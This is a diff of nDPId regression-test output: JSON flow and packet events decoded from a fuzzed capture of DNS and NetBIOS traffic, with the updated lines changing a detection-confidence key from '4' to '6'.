00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1120470774132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470774132,"pkt":"ADBUADRWAODtAW69CABFAAA+a5IAAIARS8nAqAECwKhsAQrqADUAKnjTXO4BAAABAAAAAHEAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470774132,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775049,"flow_last_seen":1120470775049,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1120470775049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470775049,"pkt":"ADBUADRWAODtAW69CABFAAA+a5MAAIARfcjAqAECwKgBAQrrADUAKvLQ4u8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775049,"flow_last_seen":1120470775049,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775049,"flow_last_seen":1120470775049,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775049,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775129,"flow_last_seen":1120470775129,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775129,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1120470775129,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470775129,"pkt":"ADBUADRWAODtAW69CABFAAA+a5QAAIARS1jAqAECwKgBAQrqADUAKnjTXO4BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775129,"flow_last_seen":1120470775129,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775129,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470775129,"flow_last_seen":1120470775129,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470775129,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1120470776050,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470776050,"pkt":"ADBUADRWAODtAW69CABFAAA+a20AAIARS8bAqAECwKgBAQrrADUAKvLQ4u8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1120470777132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470777132,"pkt":"ADBUADRWAODtAW69CABFAAA+a5YAAIARS8XAqAECwKgBAQrqADUAKnjTXO4BAAABAAAAAAAQA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1120470778053,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470778053,"pkt":"ADBUADRWAODtAW69CABFAAA+a5cAAIARS8TAqAECwKgBAQrrADUAKvLQ4m8BAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42,"global_ts_msec":1120470779135} 00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":502,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1120470778053,"pkt":"ADBUADRWAODtAW69CABFAAA+ayVzAIARS8PAqAECwKgBAQrqADUAKnjTXO4BAAABAAAABAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":503,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470779408,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":503,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120470779408,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":3,"flow_last_seen":1120470779409,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":1120470779409,"pkt":"ACjtAW69ADBUADRWCABFAAByAABAAEARtyfAqAEBwKgBAgA1CuoAXlCmXO6BgAABAAEAAgAAA3NpcAljeWJlcmNpdHkCZGsAAAECAcAMAAEAAQAAASwABNTyISPAEAACAAEAAAEsAAYDbnMywBDAEAACAAEAAAEsAAYDbnMxwBA="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470779409,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470779409,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470779487,"flow_last_seen":1120470779487,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470779487,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1120470779487,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470779487,"pkt":"ADBUADRWAODtAW69CABFAABIa5kAAIARS7jAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AkFrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470779487,"flow_last_seen":1120470779487,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470779487,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.ak","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470779487,"flow_last_seen":1120470779487,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470779487,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.ak","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1120470780685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470780685,"pkt":"ADBUADRWAODtAW69CABFAABIa5oAAIARS7fAqAECwKgBAQrsADUANNbHUxEBAAABrQAAAAAABDtzaXAEX3VkcANzaXAJqqqqqqqqqqqqqqqqqqqqqqo="} -00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":506,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470779487,"flow_last_seen":1120470780685,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470780685,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":506,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470779487,"flow_last_seen":1120470780685,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470780685,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470781608,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1120470781608,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470781608,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa5wAAIARSrHAqKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1120470782692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470782692,"pkt":"ADBUADRWAODtAW69CABFAABIa54AAIARS7PAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470784796} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470782692,"pkt":"ADBUADRWAODtAW69CABFAAB6a58AAIARS7LAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAAJF9zaXAEX3VkcANzaXAJeXliZXJjaXR5AmRrAAAhAAE="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1120470788806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470788806,"pkt":"ADBUADRWAODtAW69CABFAABIa6AAAIARS7HAqAECwKgBgQrsADUANNbHUxEBAAABAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 